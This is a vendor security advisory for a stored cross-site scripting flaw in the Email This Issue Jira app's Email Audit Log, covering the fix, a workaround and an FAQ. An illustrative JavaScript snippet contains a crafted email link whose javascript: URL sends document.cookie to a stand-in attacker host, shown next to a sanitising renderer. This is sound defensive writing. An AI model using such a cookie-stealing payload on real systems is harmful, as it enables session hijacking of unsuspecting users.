Security Advisory for incident SA20201.

Summary

A vulnerability has been discovered affecting the Email Audit Log and its items in all versions of the app before 8.0.1. A specially crafted incoming email can plant a persistent (stored) cross-site scripting payload in the audit log; the payload is triggered when a user expands the email details and clicks a malicious link in the message.

Advisory Release Date: 2020-02-18

Affected versions: all versions before 8.0.1

Fixed version: 8.0.1

About the vulnerability

The vulnerability affects the Email Audit Log and its items in all versions of the app before 8.0.1. A specially crafted incoming email can plant a persistent (stored) cross-site scripting payload in the audit log.

The threat materialises when a user expands the email details in the Email Audit Log and clicks on a malicious link in the message body. Until the app is updated to the latest version, we therefore recommend that you take extra care when opening the body of an email and clicking links in the emails shown on the issue screen or in the Email Audit Log under the app's administration page.

Below is an exact example with a screenshot:

...

This threat is present only in incoming emails; outgoing emails are not affected. If you do not use Email This Issue's mail handler for incoming email processing, you are therefore not exposed.
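The advisory does not publish the payload itself (the screenshot referenced above is not reproduced here). As an added illustration of the vulnerability class, and not code from Email This Issue or from its vendor, the following Node.js snippet contrasts a renderer that drops a stored HTML email body into the page verbatim (renderEmailUnsafe) with one that reduces the body to escaped text and re-emits only links with an explicit http(s) target (renderEmailSafe). The function names, the sample message and the hostnames are all constructed for the example and make no claim about how the app actually renders the audit log.

```javascript
// Added illustration of the stored-XSS class the advisory describes. It is
// not Email This Issue's code; function names, the sample message and the
// hostnames are assumptions constructed for this example.

// Constructed inbound email as an attacker might send it. The body is HTML
// and carries one legitimate link plus one whose href is a javascript: URL.
// Nothing executes when the message is stored; the script runs only when a
// user expands the message and clicks "Open invoice", which is the trigger
// the advisory warns about.
const constructedInboundEmail = {
  from: "billing@attacker.example",
  subject: "Invoice 123",
  htmlBody: [
    "<p>Please review the attached invoice.</p>",
    '<a href="https://invoices.example/123">Invoice 123</a>',
    "<a href=\"javascript:document.location='https://attacker.example/?c='+document.cookie\">Open invoice</a>",
  ].join(""),
};

// Vulnerable pattern: the stored HTML body is placed into the page markup
// verbatim when the audit-log entry is expanded. The javascript: href
// survives, so clicking the link runs attacker script in the viewer's session.
function renderEmailUnsafe(mail) {
  return `<div class="email-body">${mail.htmlBody}</div>`;
}

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Remove every tag; only the text between tags is kept.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, "");
}

// Accept a link target only if it has an explicit http or https scheme.
// Control characters and spaces are removed first because browsers ignore
// them inside a scheme, so "java\tscript:" would otherwise pass a naive check.
function safeHref(href) {
  const cleaned = href.replace(/[\u0000-\u0020]/g, "");
  return /^https?:\/\//i.test(cleaned) ? cleaned : null;
}

// Hardened pattern: treat the body as untrusted data. Anchors are lifted out
// and re-emitted only when their target passes safeHref(); the remaining
// markup is reduced to text and escaped. A production renderer would use a
// real HTML sanitiser (DOMPurify client-side, or the OWASP Java HTML
// Sanitizer inside a Jira plugin); the regex here keeps the example
// self-contained.
function renderEmailSafe(mail) {
  const links = [];
  const anchor = /<a\s[^>]*?href\s*=\s*"([^"]*)"[^>]*>([\s\S]*?)<\/a>/gi;
  const withoutAnchors = mail.htmlBody.replace(anchor, (_, href, text) => {
    const label = stripTags(text);
    const target = safeHref(href);
    if (target !== null) links.push({ href: target, label });
    return label; // link text stays visible; an unsafe target is simply dropped
  });
  const bodyHtml = escapeHtml(stripTags(withoutAnchors));
  const linksHtml = links
    .map((l) => `<a href="${escapeHtml(l.href)}" rel="noopener noreferrer" target="_blank">${escapeHtml(l.label)}</a>`)
    .join("");
  return `<div class="email-body">${bodyHtml}</div><div class="email-links">${linksHtml}</div>`;
}

// Stand-alone run: print both renderings side by side.
if (typeof require !== "undefined" && require.main === module) {
  console.log("UNSAFE:", renderEmailUnsafe(constructedInboundEmail));
  console.log("SAFE:  ", renderEmailSafe(constructedInboundEmail));
}
```

The two checks that matter for this advisory are the scheme check on link targets (a javascript: URL is harmless until clicked, which is why the advisory warns about clicking) and escaping of everything that is not an explicitly allowed link. Hiding the Emails tab, as in the workaround below, removes the click opportunity for ordinary users but not for administrators browsing the audit log.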

Once we became aware of the vulnerability, we considered our options and fixed it immediately.

How to fix the vulnerability

If you are using version 8.0.0 of the application

The fix release contains no new features and requires no further action on your part. Upgrade to 8.0.1 as usual and let us know if you notice anything unusual.

If you are using version 7.1.5 of the application

You can safely upgrade to version 8.0.1. Version 8.0.0 introduced two major enhancements, but they do not affect existing configurations.

If you are using an older version of the application

We recommend that you upgrade to the latest version, but read the release notes carefully and check your system first.

The official instructions for updating the application are available on the Atlassian support page.

Workaround

...

  1. Navigate to Email This Issue administration's General Configuration.

  2. Select "Hide" in the Email Audit Log's dropdown menu.

Note that this workaround is available in versions 5.3 and higher.

As a result, no user will be able to see the Emails tab at the bottom of the issue page, so the links in those emails can no longer be clicked from there.
Administrators will still be able to browse the Email Audit Log in Email This Issue's administration page, so the caution about opening email bodies and clicking links continues to apply there until the app is upgraded.

If you have any questions, please raise a support request referencing "SA-20201" in the summary, or send an email to support@metainf.atlassian.net with "SA-20201" in the subject.

FAQ

Q: Am I vulnerable if I use Jira’s internal mail handler?
A: No, you are not. You’re only affected if you are using Email This Issue’s mail handler to process incoming emails.

...

This page has moved to https://docs.meta-inf.hu/email-this-issue-for-jira-server-data-center/misc/security-advisories/email-this-issue-security-advisory-2020-02-18 and is no longer updated here.